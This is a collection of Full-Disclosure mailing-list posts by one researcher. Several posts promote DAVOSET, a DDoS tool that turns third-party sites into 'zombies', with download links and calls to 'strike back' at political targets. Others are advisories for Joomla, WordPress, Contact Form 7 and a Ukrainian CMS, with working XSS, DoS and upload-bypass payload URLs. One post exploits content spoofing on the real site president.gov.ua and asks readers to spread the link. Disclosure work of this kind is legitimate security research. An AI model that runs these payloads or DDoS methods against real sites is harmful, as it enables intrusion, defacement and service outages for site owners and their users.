[Full-disclosure] DAVOSET v.1.1.8
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 7th of March DAVOSET v.1.1.8 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is Bots Strike Back Edition. As the world knows, last week Putin declared war against Ukraine (https://soundcloud.com/mustlive/war-against-ukraine). So the army of bots will come in handy to strike back against dictator. Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Download DAVOSET v.1.1.8: http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.8.rar In new version there were added support of security bypass in plugin Google Maps, added new services into full list of zombies and removed non-working services from lists of zombies. Also there was added BYPASS method into the format of the list of zombie-servers. It allows to bypass protection of web applications, such as domain restriction in Google Maps. About this vulnerability in Google Maps plugin for Joomla I wrote earlier (http://seclists.org/fulldisclosure/2014/Feb/53). In total there are 170 zombie-services in the list, which are ready to strike against dictatorship. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in Joomla-Base
Hello list! These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities). These vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53). - Affected products: - Vulnerable are all versions of Joomla-Base, which includes this plugin. After my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1). - Affected vendors: - Pablo Arias https://github.com/pabloarias/Joomla-Base -- Details: -- Denial of Service (WASC-10): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html). XML Injection (WASC-23): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml It's possible to include external xml-files. Which also can be used for XSS attack: XSS via XML Injection (WASC-23): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml File xss.xml: XSS xmlns="http://www.w3.org/1999/xhtml";>alert(document.cookie) Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php This is possible with corresponding PHP settings, when warnings are shown. Insufficient Anti-automation (WASC-21): In this functionality there is no reliable protection from automated requests. Also in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in JoomLeague for Joomla
Hello list! These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in JoomLeague plugin for Joomla. These vulnerabilities are in Google Maps plugin for Joomla, which is used in this plugin. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53). - Affected products: - Vulnerable are JoomLeague 2.1.12 plugin for Joomla and previous versions. And packet joomleague-2-komplettpaket, which includes JoomLeague plugin. - Affected vendors: - JoomLeague Developers http://www.joomleague.net https://github.com/diddipoeler/joomleague-2-komplettpaket -- Details: -- Denial of Service (WASC-10): http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=google.com Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html). XML Injection (WASC-23): http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=site2/xml.xml It's possible to include external xml-files. Which also can be used for XSS attack: XSS via XML Injection (WASC-23): http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=site2/xss.xml File xss.xml: XSS http://www.w3.org/1999/xhtml";>alert(document.cookie) Cross-Site Scripting (WASC-08): http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E This is possible with corresponding PHP settings, when warnings are shown. Full path disclosure (WASC-13): http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php This is possible with corresponding PHP settings, when warnings are shown. Insufficient Anti-automation (WASC-21): In this functionality there is no reliable protection from automated requests. Also in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hello Timothy! As I wrote in my first letter with description of my video and additionally in my answer to Aris (http://seclists.org/fulldisclosure/2014/Feb/115), in 2009 WordPress developers made a fix for this DoS vulnerability - without thanking me and without mentioning me as researcher of this vulnerability/attack (as they did a lot since 2007). So you can consider my attack, described in my article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), as "not related to WP" and "it's not a hole in WP", but WordPress developers from December 2009 officially considered this hole/attack as related to WP. They did it 7 months after my advisory in 2009, so they read it and made a fix (lame one, which can't be consider as fix, because tables repair is not automated) - which is exactly confirmation, that developers considered such attack is possible. So since release of WP 2.9 this DoS hole in WP is officially confirmed, but still not fixed correctly, so all version of WP are affected. then some mitigation is called for Note, that WP developers exactly did some steps to protect against tables corruption attack. It's weak, but they did it in December 2009. IPB developers haven't did such protection, but since IPB 1.x they had database management inside admin panel (with tables fix function), which can be used for mitigation - as I wrote in my 2012's advisory. So IPB devs don't want to do anything more about that and WP devs made only first step, but both of them need to make protection better (tables repair must be automated). As any developer of any web application with MyISAM tables. Note one important thing. You and anybody should ask me questions in time. If I wrote advisory and published it at multiple sites in May 2009, then asking questions should be that time. Or when I wrote new advisory in 2012 about weakness of that fix and possibility to use it for attack, or when I published my article in 2012. All people who wanted to ask me, they did it in 2009 and 2012. And not asking me now, when I have almost civil war in my country and only for previous three days near 100 people were killed and hundreds were injured. Read news, my dear, about situation in Ukraine. * Will an error running a database statement lead to WordPress showing the install process to visitors? Only for special tables. Which vary for different versions of WP (and those tables are harder to corrupt, then others). That case at perishablepress.com was only one, which I know about, which happened on web site in Internet, with showing install process. Which allows to conduct engine reinstall. All other web sites, where I found tables corruption in Invision Power Bulletin (since 2007) and WordPress (since 2009), have issues with tables that leaded only to DoS. So main attack scenario of tables corruption attack is DoS of web site and only in lucky case, as with that site, it can be used for such attack scenario as engine reinstall. * What additional privileges do they then have? In case of DoS - none. Web site will be just non-working. In case of engine reinstall - attacker will have admin privileges after reinstall of WP. * Could this cause a non-exploitable db bug to become exploitable? No. It only affects web applications. In that rare case, which happed at perishablepress.com, table corruption allowed to reinstall engine, so there can be cases (vary for different webapps), when it will allow attack more then DoS ("non-exploitable" in normal state). In my video I showed DoS attack. And it's the first video in Internet which shows live tables corruption attack (in real time). And I made for that site 100% reproducible DoS. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Timothy Goddard To: na...@wordpress.org ; mustl...@websecurity.com.ua Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, February 11, 2014 10:03 PM Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress I agree that the DoS part is vague and not a vulnerability in WordPress. However, my question would be: * Will an error running a database statement lead to WordPress showing the install process to visitors? * What additional privileges do they then have? * Could this cause a non-exploitable db bug to become exploitable? If the answers there lean towards yes, lots and yes, then some mitigation is called for. Sent from Samsung Mobile Original message From: Andrew Nacin Date: To: MustLive Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress On Mon, Feb 10, 2014 at 8:02 AM, MustLive wrote: There is DoS vulnerability in WordPress, As pointed out by others, this is unbearably vague. But it's also invalid. Your &qu
[Full-disclosure] XSS and CS vulnerabilities in DSMS
Hello list! There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. This is commercial CMS. It's used particularly at government site dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine. There are also other vulnerabilities in the system, about which I've informed developers. None of the vulnerabilities were fixed. - Affected products: - Vulnerable are all versions of DSMS. - Affected vendors: - Strebul studio http://strebul.com -- Details: -- Cross-Site Scripting (WASC-08): http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie) http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Cross-Site Scripting (WASC-08): If at the site at page with jwplayer.swf (player.swf) there is possibility (via HTML Injection) to include JS code with callback-function, and there are 19 such functions in total, then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack. Example of exploit: ... jwplayer("container").setup({ flashplayer: "jwplayer.swf", file: "1.flv", autostart: true, height: 300, width: 480, events: { onReady: function() { alert(document.cookie); }, onComplete: function() { alert(document.cookie); }, onBufferChange: function() { alert(document.cookie); }, onBufferFull: function() { alert(document.cookie); }, onError: function() { alert(document.cookie); }, onFullscreen: function() { alert(document.cookie); }, onMeta: function() { alert(document.cookie); }, onMute: function() { alert(document.cookie); }, onPlaylist: function() { alert(document.cookie); }, onPlaylistItem: function() { alert(document.cookie); }, onResize: function() { alert(document.cookie); }, onBeforePlay: function() { alert(document.cookie); }, onPlay: function() { alert(document.cookie); }, onPause: function() { alert(document.cookie); }, onBuffer: function() { alert(document.cookie); }, onSeek: function() { alert(document.cookie); }, onIdle: function() { alert(document.cookie); }, onTime: function() { alert(document.cookie); }, onVolume: function() { alert(document.cookie); } } }); Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/templates/default/js/jwplayer/player.swf?config=1.xml 1.xml 1.flv 1.jpg Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters media:content and media:thumbnail in xml-file accept arbitrary addresses). For loading of playlist file from other site it needs to have crossdomain.xml. http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200 1.rss http://search.yahoo.com/mrss/";> Example playlist Video #1 First video. Video #2 Second video. Timeline: 2013.11.04 - informed administrators of government site. No response, no fix. 2013.11.13 - announced at my site. 2013.11.18 - informed developers about vulnerabilities in CMS and at dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't do it. 2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.7
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 13th of February DAVOSET v.1.1.7 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is New Hope Edition. Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Download DAVOSET v.1.1.7: http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.7.rar In new version there were added new services into full list of zombies, added support of hours in timer and improved support of plugin Google Maps 3. About vulnerabilities in Google Maps plugin for Joomla I wrote many times for last two years. In total there are 151 zombie-services in the list, which are ready to strike against ill-intentioned regime. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hi Harry! The links to my advisories and article about attack via tables corruption in MySQL and link to proof video were in my first letter. The links are also in the description of the video, which I posted on Saturday on YouTube. Aris haven't mentioned those links in his letter (he didn't quoted original letter). And I was trying not to repeat the same links all the time. So these links can be found in the list. But if you want, here they are - to make things a bit easier. Link to my 2009's post, where I described my conception of attack on example of WordPress (http://perishablepress.com/important-security-fix-for-wordpress/comment-page-5/#comment-71666) and posted the same advisory at my site. Also read my answers on questions there in comments. Link to my 2012's article Attack via tables corruption in MySQL (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/). Link to the video with my WordPress DoS exploit (http://www.youtube.com/watch?v=kwv5ni_qxXs). A proof of this vulnerability in WP and of the attack described in the article. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "Harry Metcalfe" To: "MustLive" Cc: Sent: Wednesday, February 12, 2014 4:51 PM Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress Hi MustLive, Just to make things a bit easier, would you mind replying with links for the perishablepress.com article, the 2009 advisory and the 2012 article? Many thanks! Harry On 12/02/2014 14:44, MustLive wrote: Hello Aris! First of all, I wrote all required information in my post in May 2009 at perishablepress.com. And I answered on all questions (including lame ones and scepsis) concerning attack on WordPress, which I proposed to owner of that site as explanation why his site was hacked that time (via engine reinstall). And since I developed conception of this attack yet in 2007 (for IPB, because I have forum on this engine) and made advisories for WordPress and IPB concerning possibility of attacks via table corruption, so in 2012 I made detailed article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), which I published at my site and in WASC mailing list. So all aspects of attacks were described and all questions were answered by me many years ago. Those who didn't read that information should read it, those who have questions should read my 2009's advisory and 2012's article - AND THEY WILL HAVE NO QUESTIONS. And for those who have scepsis about database corruption attacks - that it's not possible to make reliable attack with 100% chance to conduct attack on real web site - for those I made exploit and video of its use on web site in Internet. So unbelievers should watch video and believe. I have yet to determine if that was an accident or an attack. I'm sure that your case is an accident, not an attack. Since everyone after I proposed this attack from 2009 and till now didn't believe in possibility of this attack and considered it as "conceptual". I.e. that was "luck" for attackers to hack perishablepress.com with using of tables corruption that particular day and it'll not happen again for nobody as skeptics thought. My video should change their mind. First of all it's hard attack and I didn't release my exploit (and will not release it in near future) and not aware about anyone's exploit in the public for 5 years after my 2009's advisory. So you have exact combination of hardware and software (MySQL and WordPress) that makes your site vulnerable to this attack. Most of web sites on WordPress can sleep tight until some day an attacker will test their site on "crashability" and make them vulnerable to this attack. For all nuances of attacking on tables in MySQL read my article to understand your case and create scenario of possible attack on your site to trigger table crash, which leads to DoS. Concerning your case I'll write more information to you privately. It's needed to you to find out the exact way of crashing tables at site to prevent "accident" turn into "attack". Note, that WP developers later in 2009, after reading that my publication and thinking for 7 months, made a fix for this DoS in WP 2.9. But they made not automated tables repair, but manual, so it can't be considered as a fix, since tables can be crashed and site will be DoSed - until admin will find it and manually repair the tables. So WP developers made lame fix for this DoS attack, as I wrote in my 2012 advisory and WP is still vulnerable (and also I described DoS vulnerability in protection functionality against this DoS attack). If Mustlive has any real and concrete information (URL, exploit code), please share with us.
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hello Aris! First of all, I wrote all required information in my post in May 2009 at perishablepress.com. And I answered on all questions (including lame ones and scepsis) concerning attack on WordPress, which I proposed to owner of that site as explanation why his site was hacked that time (via engine reinstall). And since I developed conception of this attack yet in 2007 (for IPB, because I have forum on this engine) and made advisories for WordPress and IPB concerning possibility of attacks via table corruption, so in 2012 I made detailed article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), which I published at my site and in WASC mailing list. So all aspects of attacks were described and all questions were answered by me many years ago. Those who didn't read that information should read it, those who have questions should read my 2009's advisory and 2012's article - AND THEY WILL HAVE NO QUESTIONS. And for those who have scepsis about database corruption attacks - that it's not possible to make reliable attack with 100% chance to conduct attack on real web site - for those I made exploit and video of its use on web site in Internet. So unbelievers should watch video and believe. I have yet to determine if that was an accident or an attack. I'm sure that your case is an accident, not an attack. Since everyone after I proposed this attack from 2009 and till now didn't believe in possibility of this attack and considered it as "conceptual". I.e. that was "luck" for attackers to hack perishablepress.com with using of tables corruption that particular day and it'll not happen again for nobody as skeptics thought. My video should change their mind. First of all it's hard attack and I didn't release my exploit (and will not release it in near future) and not aware about anyone's exploit in the public for 5 years after my 2009's advisory. So you have exact combination of hardware and software (MySQL and WordPress) that makes your site vulnerable to this attack. Most of web sites on WordPress can sleep tight until some day an attacker will test their site on "crashability" and make them vulnerable to this attack. For all nuances of attacking on tables in MySQL read my article to understand your case and create scenario of possible attack on your site to trigger table crash, which leads to DoS. Concerning your case I'll write more information to you privately. It's needed to you to find out the exact way of crashing tables at site to prevent "accident" turn into "attack". Note, that WP developers later in 2009, after reading that my publication and thinking for 7 months, made a fix for this DoS in WP 2.9. But they made not automated tables repair, but manual, so it can't be considered as a fix, since tables can be crashed and site will be DoSed - until admin will find it and manually repair the tables. So WP developers made lame fix for this DoS attack, as I wrote in my 2012 advisory and WP is still vulnerable (and also I described DoS vulnerability in protection functionality against this DoS attack). If Mustlive has any real and concrete information (URL, exploit code), please share with us. All real and concrete information is in my 2009's advisory and 2012's article. With addition of my 2014's video (I was planning to make it in 2012, but found time only this month). So reading and watching of them will help. For now I'll not release any exploits (don't need to create a risk not for that lame site in my video, nor for all other WordPress sites, since WP developers haven't fixed hole properly), but I'll do it in the future. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "Aris Adamantiadis" To: "Andrew Nacin" ; "MustLive" Cc: Sent: Tuesday, February 11, 2014 3:46 PM Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress Le 11/02/14 09:34, Andrew Nacin a ?crit : Aris mentions he experienced corruption in his own WordPress setup. It's most likely the options table simply crashed, not as a result of any particular exploit. This is, after all, why MySQL has a REPAIR command (and why we have a script for users to use). This happened again last night. The mysql corruption was caused by an OOM random kill (thanks linux) that chose mysql daemon as a victim. The cause of the OOM was either wordpress or piwik, probably made possible through apache misconfiguration (too many children). I have yet to determine if that was an accident or an attack. If Mustlive has any real and concrete information (URL, exploit code), please share with us. Aris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS via tables corruption in WordPress
Hello participants of Mailing List. There is DoS vulnerability in WordPress, about which I wrote in 2009 (http://websecurity.com.ua/3152/, on English http://perishablepress.com/important-security-fix-for-wordpress/comment-page-5/#comment-71666), which allows to conduct DoS attack or reinstall of the engine (depending on corrupted table). And in 2012 (http://websecurity.com.ua/5774/, on English http://securityvulns.ru/docs27968.html) I wrote that developers hadn't fixed it, even they said so, and they made new DoS vulnerability. In April 2012 I wrote my article "Attack via tables corruption in MySQL" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-May/008363.html) and in July made English version of the article (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/). Where I described vulnerabilities in WordPress and IPB which are based on my conception of attack via tables corruption. On Saturday I published a video with my WordPress DoS exploit (http://www.youtube.com/watch?v=kwv5ni_qxXs), which shows this DoS attack on one security site on WordPress. Vulnerable are all versions of WordPress. This video is a proof of this vulnerability in WP and of the attack described in the article. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New vulnerabilities in Google Maps plugin for Joomla
Hello list! Last year I wrote about multiple vulnerabilities in Google Maps plugin. After my informing the developer fixed them, but this year I found new vulnerabilities. These are Denial of Service and Insufficient Anti-automation vulnerabilities in Google Maps plugin for Joomla. - Affected products: - Vulnerable are Google Maps plugin v3.2 for Joomla and previous versions. Except versions 2.19, 2.20 and 3.1 of the plugin where proxy functionality was removed. I've informed the developer about these holes. Now he is working on a new version of the plugin. He hasn't released Google Maps v3.2 yet, only put it on his site. And after fixing all reported vulnerabilities, he will release it to the public. - Affected vendors: - Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 -- Details: -- Denial of Service (WASC-10): It's possible to conduct attacks on target sites, where domain of web site with Google Maps plugin is used as subdomain. For old versions of the plugin "plugin_googlemap2_proxy.php" is used and for new versions of the plugin "plugin_googlemap3_kmlprxy.php" is used. E.g. request for attack on site wordpress.com via script at web site "site": http://site/plugins/system/plugin_googlemap2_proxy.php?url=site.wordpress.com http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site.wordpress.com It's needed by bypass security filter (domain restriction) if it's turned on. Thus it's possible to attack web sites, which allow arbitrary subdomains. Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html). Insufficient Anti-automation (WASC-21): Last year in Google Maps plugin v3.2 the developer made protection from automated attacks, but it's not effective. And use of above-mentioned domain check can be bypassed. In this functionality there is no reliable protection from automated requests. To bypass protection for accessing this script (appeared in version 3.2) it's needed to set referer, cookie and token. The referer is current site, the cookie is set by the site (Joomla) itself and the token can be found at page which uses plugin of the site (and it's setting in URL). This data can be taken from the site automatically. Referer: http://site Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0 I have disclosed it at my site (http://websecurity.com.ua/6987/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in Contact Form 7 for WordPress
Hello list! I want to inform you about vulnerabilities in Contact Form 7 plugin for WordPress. These are Code Execution via Arbitrary File Uploading vulnerabilities (two attack vectors). This is addition to previous Code Execution vulnerability in Contact Form 7 (http://seclists.org/fulldisclosure/2013/Nov/182). - Affected products: - Vulnerable are Contact Form 7 3.5.3 and previous versions. After my informing developer fixed previous hole in version 3.5.3, but refused to fix these two attack vectors, so all versions of Contact Form 7 are vulnerable. The attacks are possible only on earlier versions of WordPress, but in the last versions the WP itself blocks attacks via semicolon and double extensions. So developer doesn't want to make the protection in his plugin itself (the WP must do the work) and he doesn't take into account possibilities that somebody could run plugin on older versions of engine or in the future versions of WP the protection code could be changed. So I recommend to use this plugin (since 3.5.3) only with the last versions of WordPress. - Affected vendors: - Contact Form 7 http://contactform7.com -- Details: -- Code Execution (WASC-31): Attack is going via uploader. For code execution it's needed to use bypass methods for IIS and Apache. It's possible to use semicolon in file name (1.asp;.txt) on IIS or double extension (1.php.txt) on Apache. The attack can be made as by user with admin rights (to make contact form with uploader tag), as by unauthenticated user, if there is already contact form with uploader tag at web site - with default configuration (unlike previous CE hole). There must be uploader tag in contact form. [file file-423] The files are uploaded into folder: http://site/wp-content/uploads/wpcf7_uploads/ At creation of this folder the file .htaccess is created (with content: Deny from all). It can be bypassed at using of other web servers besides Apache (where .htaccess is ignored), or at Apache it's possible to use vulnerabilities in WP for file deletion, or via LFI vulnerability to include a file from this folder. Timeline: 2013.09.28 - announced at my site about the first hole. 2013.10.01 - informed developer. 2013.10.03-21 - conversation with developer about different vulnerabilities in CF7. 2013.10.09 - plugin version 3.5.3 was released (with fix for the first hole). 2013.10.09 - announced at my site about new holes. 2014.01.28 - disclosed at my site (http://websecurity.com.ua/6806/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dictatorial laws in Ukraine
Hello participants of Mailing List. Last week I wrote about multiple vulnerabilities at president.gov.ua (http://seclists.org/fulldisclosure/2014/Jan/125). This is continuation of that letter. I remind you, that in Ukraine last week parliament in non-constitutional way voted for "Dictatorial laws" (https://twitter.com/EuromaidanPR/status/425224768334225408) and president quickly signed them. The dictatorial laws (especially #3879 one) forbid a lot of things and introduce censorship, including censorship in Internet - SOPA can't be even compared to it. Because president ignored all protests against these laws (the same as previous two months of protests), it leaded to more active protests since 19.01.2013. At this week these laws were officially printed and since 22.01.2013 they are working. And on Wednesday after 16:00 two my sites were closed (domains were deactivated) by provider due to "decision of special services". It was due to that video about our president, which I "published" at president's site via Content Spoofing vulnerability. This is dictatorial law in action. Now they can turned off any site for defamation (and other things). And they can do it without decision of a court - very quickly close any site on Ukrainian hosting and domains. After wasting a lot of time till the end of the day I returned my domains back. But removed flv-file from my site. And last night I put video-file to foreign server, so Ukrainian special services can't shut it down :-). So here is "republished" video at president's web site, in which Victor Yanukovich told about his corruption and criminal actions (on Ukrainian language). http://president.gov.ua/js/jw/player.swf?file=http://lordepsylon.net/video.flv&autostart=true Use this new URL. Spread it all over social networks, as I did last night in my accounts. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.6
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 24th of January DAVOSET v.1.1.6 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is Revolution Edition. Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Download DAVOSET v.1.1.6: http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.6.rar In new version there were added new services into full list of zombies and removed non-working services from lists of zombies, added support of trailing slash in URL for translate.yandex.net and improved algorithm of work with open files. There were added three sites of Yandex - in addition to sites of Google, W3C and a lot of other web sites (who don't want to fix their holes for many years). In total there are 141 zombie-services in the list, which are ready to strike against ill-intentioned regime. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities at president.gov.ua
Hello participants of Mailing List. For those who didn't read my posts in social networks last night and at my web site, here is information about multiple vulnerabilities at president.gov.ua. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities. In January 2007 I made "presidents fiesta" - published multiple vulnerabilities at web sites of presidents of Ukraine, Russia, USA, Byelorussia and Slovakia. And here are new holes at web site of new president of Ukraine. Cross-Site Scripting (WASC-08): http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Content Spoofing (WASC-12): http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua Here is nice example of using one of these holes. The video is "published" at president's web site, in which Victor Yanukovich told about his corruption and criminal actions (on Ukrainian language). http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true P.S. Photos and videos of current protest events in Kyiv Ukraine see in Twitter (including online video translation in my Twitter account). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.5
